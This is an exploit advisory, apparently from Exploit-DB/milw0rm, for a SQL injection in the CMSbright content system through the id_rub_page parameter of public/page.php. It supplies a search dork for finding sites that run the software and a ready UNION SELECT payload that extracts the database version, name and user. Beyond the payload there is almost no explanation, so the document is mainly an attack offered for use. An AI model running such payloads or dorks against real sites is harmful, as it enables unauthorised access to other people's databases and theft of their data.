CMSbright (id_rub_page) Remote SQL Injection Vulnerability

# Title: CMSbright (id_rub_page) Remote SQL Injection Vulnerability
# EDB-ID: 6343
# CVE-ID: (2008-6991)
# OSVDB-ID: (47910)
# Author: BorN To K!LL
# Published: 2008-09-01
# Verified: yes
# Download Exploit Code
# Download N/A

-------------------------------------------
Script  :  CMSbright ..
 
site     :  http://www.cmsbright.com/
 
Author :  BorN To K!LL
 
Dork    :  powered by CMSbright © websens
-------------------------------------------
 
Exploit   :
 
public/page.php?id_rub_page=[SQL]
 
Example :
 
public/page.php?id_rub_page=-9990+union+all+select+concat(version(),database(),user()),2,3,4--
 
-------------------------------------------  
Greets :
 
Dr.2  ,  General C  ,  CcTero0liTi  ,  GolD_M .. & all my friends ..
 
-------------------------------------------

# milw0rm.com [2008-09-01]